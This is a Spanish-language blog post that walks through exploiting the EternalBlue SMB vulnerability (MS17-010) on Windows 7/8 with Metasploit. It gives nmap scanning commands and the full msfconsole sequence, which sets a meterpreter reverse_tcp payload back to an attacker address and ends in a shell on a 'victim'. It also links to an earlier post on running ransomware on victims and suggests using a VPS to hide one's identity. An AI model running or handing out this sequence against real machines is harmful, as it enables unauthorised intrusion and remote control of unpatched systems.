lunes, 18 de septiembre de 2017

MS17-010 EternalBlue - Remote Hacked Windows 7/8 64BITS Metasploit



Saludos mis queridos fieles lectores, luego de ver algunos mensajes de nuestros seguidores respecto al Exploit MS17-010 EternalBlue que fue una bomba a inicios del mes de marzo.

Si bien es cierto este Exploit fue publicado gracias a una fuga de información - "Leak".
Afecto a muchas empresas a nivel mundial aprovechando la vulnerabilidad SMB  en el puerto 445 para ejecutar códigos maliciosos remotamente, efectuando ataques APT'S mundiales como el ransomware "Wannacry" y "Petya"

En el anterior POST enseñe como puedes ejecutar este ransomware en el sistema de tu victima:
https://www.backtrackomar.com/2017/09/generando-payloads-con-chaos-framework.html

¿Como funciona Eternalblue?

EternalBlue aprovecha una vulnerabilidad en la implementación del protocolo Server Message Block (SMB) de Microsoft. Esta vulnerabilidad, denotada como CVE-2017-0144 en el catálogo Common Vulnerabilities and Exposures (CVE), se debe a que la versión 1 del servidor SMB (SMBv1) acepta en varias versiones de Microsoft Windows paquetes específicos de atacantes remotos, permitiéndoles ejecutar código en el ordenador en cuestión.

Referencia: https://es.wikipedia.org/wiki/EternalBlue

Comencemos 

El exploit se encuentra en los repertorios de msfconsole instalado, si no lo tienes actualizalo.

root@kali:/# apt update && apt upgrade && apt dist-upgrade 

Otra alternativa:

root@kali:/# msfupdate

Bueno lo primero que debes hacer tu como "Analizador" en un entorno real "Abrir los puertos de tu Router" o elaborarlo desde un VPS (Por su seguridad de identidad si el caso lo a merita)

En primer instancia haremos un escaneo en mi red local para encontrar los dispositivos conectados:

Nmap - Mapeando redes y verificando que puertos tienen abiertos:

root@kali:/# nmap 192.168.1.1/24 -O sU -sT


POST: https://www.backtrackomar.com/2014/04/aprendiendo-nmap-nivel-basico.html

Nuestro objetivo tiene el puerto 445 y por lo que nos indica Nmap corre Windows 7 por la cantidad de repeticiones.

Vamos a utilizar el script " de análisis vulnerabilidades de nmap para testear si es vulnerable.

root@kali:/# nmap --script smb-vuln-ms17-010.nse -p445  192.168.1.3

Genial, a continuación ejecutaremos msfconsole para la explotación remota, pero antes activen el servidor de base de datos.

root@kali:/# service postgresql start
root@kali:/# msfconsole 


Source:
-------------------------------------------------------------------------------------------------------------------------
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.3
RHOST => 192.168.1.3
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.33
lhost => 192.168.1.33

msf exploit(ms17_010_eternalblue) > exploit
--------------------------------------------------------------------------------------------------------------------------

Luego que se ejecute el código malicioso remotamente, hemos tenido la sesión meterpreter de nuestra victima:

El sistema esta completamente comprometido,  si deseas interactuar el S.O de la victima te dejo un articulo de hace años. se que te ayudara.


! Saludos !


0 comentarios:

Publicar un comentario

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares